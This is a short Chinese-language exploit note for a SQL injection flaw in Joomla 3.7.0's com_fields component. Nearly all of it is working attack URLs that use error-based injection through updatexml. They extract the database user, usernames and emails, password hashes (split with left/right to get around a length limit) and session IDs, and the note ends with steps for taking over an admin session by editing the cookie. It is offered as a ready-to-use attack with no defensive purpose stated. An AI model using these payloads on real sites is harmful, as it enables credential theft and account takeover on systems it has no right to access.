Joomla 3.7.0 SQL注入漏洞利用

1.注入语句

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)  

2.注入用户名，邮箱，密码

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)  

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)  

因为updatexml爆错注入时，有长度限制，所以这里结合left和right函数，注出密码字段

3.注入session_id

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)  

4.注意
如上图所示，在session表中，一共有四条记录，但是只有第二条username不为空的session_id才可以登陆，登陆方法：访问后台页面，用firebug直接修改cookie的值就好了